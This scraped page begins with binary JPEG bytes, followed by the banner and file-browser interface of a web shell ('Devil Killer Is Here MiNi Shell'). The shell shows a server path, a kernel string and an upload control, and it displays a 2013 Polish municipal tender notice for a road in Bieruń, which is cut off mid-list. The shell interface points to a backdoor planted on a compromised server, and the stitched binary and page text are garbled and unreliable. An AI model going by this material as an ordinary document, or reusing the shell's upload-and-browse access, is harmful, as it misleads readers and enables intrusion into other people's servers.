JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130219/25989-N-2013.html

<p class="kh_header"><b>Bieruń: Budowa ul. bocznej Marcina - dojazd do budynku mieszkalnego wielorodzinnego na os. Homera w Bieruniu</b><br>
<b>Numer ogłoszenia: 25989 - 2013; data zamieszczenia: 19.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieruń reprezentowana przez Burmistrza Miasta Bieruń , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 32 3242400, faks 32 2164777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa ul. bocznej Marcina - dojazd do budynku mieszkalnego wielorodzinnego na os. Homera w Bieruniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A) Przedmiotem zamówienia jest budowa ulicy bocznej Marcina, tj. dojazdu do budynku mieszkalnego wielorodzinnego na osiedlu Homera w Bieruniu, obejmująca:
- budowę odcinka drogi gminnej klasy L o długości 135 m wraz z jednostronnym chodnikiem; 
- budowę kanalizacji deszczowej; 
- budowę linii oświetlenia ulicznego;
- przebudowę linii kablowej SN 20 kV.

B) Zakres przedmiotu zamówienia obejmuje:
1.	Roboty geodezyjne, w tym inwentaryzację istniejącego terenu oraz utrwalenie granic znakami granicznymi.
2.	Roboty drogowe - rozbiórkowe, ziemne i nawierzchniowe:
a)	droga klasy L, kategoria ruchu KR4 (jezdnia z kostki betonowej - pow. 842,0 m2),
b)	chodnik z kostki betonowej - pow. 214,0 m2,
c)	zjazdy do posesji z kostki betonowej - pow. 48,0 m2,
d)	regulacja urządzeń istniejących.
3.	Wykonanie oznakowania pionowego i poziomego.
4.	Zieleń.
5.	Budowa sieci kanalizacji deszczowej - o dł. 91m. 
6.	Budowa oświetlenia ulicznego:
a)	kabel YAKXs 4x35 mm2 - dł. 171 m, zasilający słupy oświetleniowe,
b)	słupy oświetleniowe na fundamencie betonowym wraz z oprawami oświetleniowymi - 5 kpl.,
7.	Przebudowa linii kablowej SN 20 kV:
a)	przełożenie kabla średniego napięcia SN 20 kV -  dł. około 510 m,
b)	wykonanie przewiertu dla kabla SN pod drogą - dł. 13 m,

C) Szczegółowy opis i zakres przedmiotu zamówienia zawarty jest w następujących opracowaniach: 
1.	Projekt Budowlany - branża: drogowa z odwodnieniem, elektryczna.
2.	Projekt Wykonawczy - branża: elektryczna.
3.	Projekt docelowej i tymczasowej organizacji ruchu.
4.	Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych (STWiORB).
5.	Przedmiary robót - branża: drogowa z odwodnieniem, elektryczna.

D) Wykonawca, dodatkowo, w ramach realizacji przedmiotu zamówienia i w ramach zaoferowanej ceny: 
a)	zastosuje do realizacji przedmiotu zamówienia tylko nowe materiały, urządzenia oraz wyposażenie,
b)	opracuje plan bezpieczeństwa i ochrony zdrowia (BIOZ),
i przedstawi go zamawiającemu do uzgodnienia,
c)	zorganizuje własne zaplecze na potrzeby budowy w miejscu uzgodnionym z zamawiającym,
d)	wykona zasilanie placu budowy w energię elektryczną i wodę  oraz pokryje koszty zużycia wody                i energii elektrycznej,
e)	dokona ewentualnych zamknięć i wyłączeń czasowych mediów,
f)	zleci nadzory specjalistyczne właścicielom lub gestorom urządzeń uzbrojenia terenu, w pobliżu których będą prowadzone roboty,
g)	zapewni bieżącą obsługę geodezyjną,
h)	przeprowadzi wszelkie: próby, badania, odbiory przewidziane przepisami, w tym przede wszystkim wynikających ze STWiORB, nie ujętych w przedmiarze robót.
i)	weźmie udział w przekazaniu wykonanych robót wraz z wymaganą dokumentacją poszczególnym gestorom urządzeń uzbrojenia terenu na warunkach określonych przez nich 
w trakcie uzgadniania dokumentacji,
j)	zapewnieni warunki bezpieczeństwa na drodze w okresie jej wykonywania poprzez prawidłowe oznakowanie miejsca robót i zajęcia pasa drogowego, oraz bieżące utrzymanie 
i czyszczenie dróg, z których będzie korzystał wykonawca w czasie realizacji zadania, 
k)	prawidłowo oznakuje oraz zabezpieczy dojścia i dojazdy do poszczególnych nieruchomości 
w okresie prowadzenia robót,
l)	będzie informować na bieżąco właścicieli i użytkowników posesji o wszelkich utrudnieniach 
oraz przerwach w dostawie mediów, spowodowanych realizacją przedmiotu zamówienia,
m)	zabezpieczy możliwość dojazdu pojazdów uprzywilejowanych (straż, pogotowie itp.),
n)	naprawi wszelkie szkody wyrządzone osobom trzecim w toku realizacji robót,
o)	w przypadku uszkodzenia urządzeń - poniesie koszty usunięcia awarii oraz koszty poniesionych strat eksploatacyjnych,
p)	przywróci teren zajęty w czasie realizacji zadania do stanu pierwotnego wraz z uzyskaniem oświadczeń właścicieli przyległych terenów o braku zastrzeżeń do granic i stanu terenu po wykonaniu robót;
q)	wykona i przekaże dokumentację fotograficzną zakresu robót - wersja elektroniczna z datami wykonania zdjęć wszystkich obiektów kubaturowych, ogrodzeń, innych obiektów sąsiadujących 
z budowana drogą, którą należy wykonać przed przystąpieniem do robót, w trakcie oraz po zakończeniu robót (bezwzględnie elementy ulegające zakryciu);
r)	wykona tymczasową organizację ruchu (zezwolenie na zajęcie pasa drogowego na czas 
       prowadzenia robót, dostawa, montaż i demontaż oznakowania);
s)	wykona dokumentację powykonawczą wg § 10 ust. 4 umowy w 4 egz. (1 egz. dokumentacji 
powykonawczej musi zawierać oryginały wszystkich dokumentów).                                                                                                                                

E)Jeżeli w dokumentacji technicznej, specyfikacji technicznej wykonania i odbioru robót oraz SIWZ
określone zostały materiały i urządzenia przy pomocy znaków towarowych, patentu lub pochodzenia, 
nie oznacza to, że nie można zastosować materiałów i urządzeń równoważnych, lecz o nie gorszych parametrach i spełniających wymogi podane w projekcie i specyfikacji technicznej wykonania i odbioru robót. Podane w opisach nazwy własne nie mają na celu naruszenia art.29 i art.7 ustawy Prawo zamówień publicznych, a mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych i technologicznych zamawiającego. Zamawiający dopuszcza rozwiązania równoważne pod warunkiem spełnienia tego samego lub wyższego poziomu jakościowego, technologicznego i estetycznego, określonych w SIWZ i STWOiR.
Zabudowane i dostarczone materiały budowlane muszą posiadać wszystkie wymagane Prawem
budowlanym i polskimi normami, przenoszącymi zharmonizowane normy europejskie, atesty,
certyfikaty i aprobaty techniczne. 
F)Zamawiający nie przewiduje: udzielenia zamówień uzupełniających, zaliczek na poczet wykonania
zamówienia, aukcji elektronicznej, zawarcia umowy ramowej, dynamicznego systemu zakupów
w rozumieniu ustawy oraz stosowania wymagań określonych w art.29 ust.4 ustawy.
Zamawiający nie dopuszcza składania ofert częściowych, wariantowych.
Odpowiedzialność wykonawcy z tytułu gwarancji za wady w odniesieniu do całego przedmiotu umowy wynosi 60 miesięcy, licząc od daty odbioru przedmiotu umowy, z wyłączeniem urządzeń, na które udzielana będzie gwarancja producenta.

G)Przedmiotowe zamówienie będzie finansowane przez Kompanię Węglową S.A. Katowice   
    Oddział KWK Ziemowit w Lędzinach.

H) Nazwy i kody według słownika CPV:
kod CPV:	45100000-8	Przygotowanie terenu pod budowę
kod CPV:	45111000-8	Roboty w zakresie burzenia, roboty ziemne
kod CPV:	45230000-8	Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych 
			i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu
kod CPV:	45231000-5	Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych 
			i linii energetycznych
kod CPV:	45232400-6	Roboty budowlane w zakresie kanałów ściekowych
kod CPV:	45233120-6	Roboty w zakresie budowy dróg
kod CPV:	45233221-4	Malowanie nawierzchni
kod CPV:	45233290-8	Instalowanie znaków drogowych
kod CPV: 45311000-0  Roboty w zakresie przewodów instalacji elektrycznych oraz opraw elektrycznych
kod CPV: 45311100-1  Roboty w zakresie przewodów instalacji elektrycznej,
kod CPV: 45311200-2  Roboty w zakresie opraw elektrycznych,
kod CPV: 45312311-0  Instalowanie oświetlenia,
kod CPV: 45314200-3  Instalowanie infrastruktury kablowej,
kod CPV: 45314300-4  Kładzenie kabli,	
kod CPV: 45315300-1  Instalowanie linii energetycznych,
kod CPV: 45316100-6  Instalowanie zewnętrznego sprzętu oświetleniowego,
kod CPV: 45317000-2  Inne instalacje elektryczne.
kod CPV:	77314100-5	Usługi w zakresie trawników.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.10.00-8, 45.23.00.00-8, 45.23.10.00-5, 45.23.24.00-6, 45.23.31.20-6, 45.23.32.21-4, 45.23.32.90-8, 45.31.10.00-0, 45.31.11.00-1, 45.31.12.00-2, 45.31.23.11-0, 45.31.42.00-3, 45.31.43.00-4, 45.31.53.00-1, 45.31.61.00-6, 45.31.70.00-2, 77.31.41.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zasady wnoszenia wadium
Wadium w wysokości  7 000,00 zł ( słownie: siedemtysięcyzłotych 00/100) musi być wniesione               w terminie, który został podany w punkcie Terminy.
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego.
w BS O/Tychy numer konta: 26 84350004 0000 0000 6158 0001 z adnotacją:
Wadium - nr sprawy: ZP.271.5.2013 Przetarg nieograniczony na wybór wykonawcy zamówienia  pn.  Budowa ul. bocznej Marcina - dojazd do budynku mieszkalnego wielorodzinnego na os.Homera w Bieruniu.
Termin  wniesienie wadium w pieniądzu oznacza uznanie kwoty wadium, wpłaconego przelewem, 
na rachunku zamawiającego nie później niż do godz. 10:00 w dniu wyznaczonym do składania ofert.
Wadium wnoszone w innej formie niż pieniądz należy złożyć w kasie Urzędu Miejskiego w Bieruniu, nie później niż do godz. 10:00 w dniu wyznaczonym do składania ofert. Termin ważności wadium wniesionego w innej formie niż pieniądz musi obejmować okres nie krótszy niż termin związania ofertą tj. nieprzerwanie obejmujący okres 30 dni włącznie z dniem wyznaczonym do składania ofert.
W przypadku przesyłania wadium pocztą, należy na opakowaniu umieścić zapis:
Wadium do przetargu (nazwa postępowania). 
Należy przekazać do kasy Urzędu Miejskiego w Bieruniu, 43-150 Bieruń, Rynek 14 do godz.10.00 (wpisać dzień składania ofert).
Wadium może być wniesione w następujących formach:
1)	w pieniądzu przelewem,
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,                    z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	w gwarancjach bankowych,
4)	w gwarancjach ubezpieczeniowych,
5)	w poręczeniach udzielanych przez podmioty, o których mowa w art.6 b ust.5 pkt 2 ustawy z dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109 poz.1158                 z późniejszymi zmianami).
Jeżeli powyższe dokumenty wystawione są w języku obcym, należy przedłożyć je wraz                      z tłumaczeniem na język polski.
W przypadku wniesienia wadium przez wykonawców wspólnie ubiegających się                               o udzielenie nin. zamówienia, zaleca się  wskazać informacyjnie wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia wraz z podaniem ich nazw i siedzib.
Wykonawca, który nie wniesie wadium, zostanie wykluczony z postępowania, zgodnie                         z art. 24 ust. 2 pkt 2 ustawy pzp, a jego oferta zostanie uznana za odrzuconą.
2. Zasady zwrotu wadium
Wadium wniesione w pieniądzu zamawiający zwróci, zgodnie z art. 46 ust. 4 ustawy pzp wraz                      z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek wykonawcy.
1)	Zgodnie z art. 46 ust.1 ustawy pzp, zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem  wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust. 4a.
2)	Wykonawcy którego oferta została wybrana jako najkorzystniejsza zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
3)	Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
4)	Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podst. art. 46 ust.1 ustawy pzp , jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta zostanie wybrana jako najkorzystniejsza. Wadium zostanie wniesione w terminie określonym przez zamawiającego
3. Utrata wadium
Zgodnie z zastrzeżeniem art.46 ust.4a ustawy pzp zamawiający zatrzymuje wadium wraz                                  z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3 ustawy pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1 ustawy pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
Ponadto zgodnie z art.46 ust.5 ustawy pzp zamawiający zatrzymuje wadium wraz z odsetkami, jeżeliby wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych                    w ofercie;
2)  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)  zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy:
Posiadają uprawnienia do wykonywania działalności lub czynności, jeżeli ustawy nakładają   
 obowiązek posiadania takich uprawnień.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/nie spełnia, na podstawie przedłożonego przez wykonawcę: 
- oświadczenia (zgodnie z art. 22 ust. 1 pkt 1 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, 
że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy:
Posiadają wiedzę i doświadczenie: 
     Wykonali zgodnie ze sztuką budowlaną i prawidłowo ukończyli w okresie ostatnich pięciu lat przed      
     upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy - to w tym 
okresie roboty budowlane w zakresie budowy min. jednej drogi klasy min. L ,o długości min. 130,0m,              o nawierzchni z kostki betonowej.
Ocena spełnienia warunku będzie dokonana wg zasady spełnia/nie spełnia, na podstawie przedłożonego przez wykonawcę:
- oświadczenia (zgodnie z art.22 ust.1 pkt 2 ustawy pzp),
     - wykazu wykonanych robót w zakresie budowy:
min. jednej drogi klasy min. L, o długości min. 130,0m, o nawierzchni z kostki betonowej, z podaniem  ich rodzaju, daty  i miejsca  wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (np. referencji, protokołów końcowych odbioru robót).
Przez wykonali należy rozumieć, że roboty  zostały zakończone i odebrane protokołami 	 końcowymi odbioru robót w ostatnich pięciu latach przed upływem terminu składania ofert,
a jeżeli okres jest krótszy - w tym okresie. 



    W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia ocena 
    warunku nastąpi łącznie tzn. należy wykazać, że warunek wykonania budowy
min. jednej drogi klasy min. L, o długości min. 130,0m, o nawierzchni z kostki   betonowej 
przynajmniej spełnia przynajmniej jeden z wykonawców. 
Przez określenie droga należy rozumieć brzmienie wskazane w ustawie z dnia 21 marca 1985 r.                   
o  drogach publicznych (Dz.U. z 2007 r., Nr 19, poz.115 z późn. zmianami).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy:
Dysponują odpowiednim potencjałem technicznym do wykonania zamówienia.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/nie spełnia, na podstawie
przedłożonego  przez wykonawcę:
- oświadczenia (zgodnie z art.22 ust.1 pkt 3 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy:
Dysponują odpowiednimi osobami zdolnymi do wykonania zamówienia.
    Dysponują co najmniej jedną osobą posiadającą uprawnienia do kierowania robotami     
    drogowymi bez ograniczeń, która będzie uczestniczyć w wykonaniu zamówienia.
    Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie
    przedłożonego przez wykonawcę:
-	oświadczenia (zgodnie z art.22 ust.1 pkt 3 ustawy pzp)
-	wykazu osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za  kierowanie robotami drogowymi (uprawnienia drogowe bez ograniczeń), wraz  z informacjami 
na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.  
   W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, 
   że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy:
Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej zrealizowanie zamówienia.
    Posiadają środki finansowe lub zdolność kredytową w wysokości 100 000,00 zł.
    Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/nie spełnia, na podstawie          
    przedłożonego przez wykonawcę: 
    - oświadczenia (zgodnie z art.22 ust.1 pkt 4 ustawy pzp).
    - informacji z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy w wysokości 100 000,00 zł, wystawionej nie wcześniej niż 3 m-ce przed upływem terminu  składania ofert.
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, 
że warunek spełnia jeden z tych wykonawców lub wykonawcy wspólnie ubiegający się o udzielenie 
     zamówienia spełniają go łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

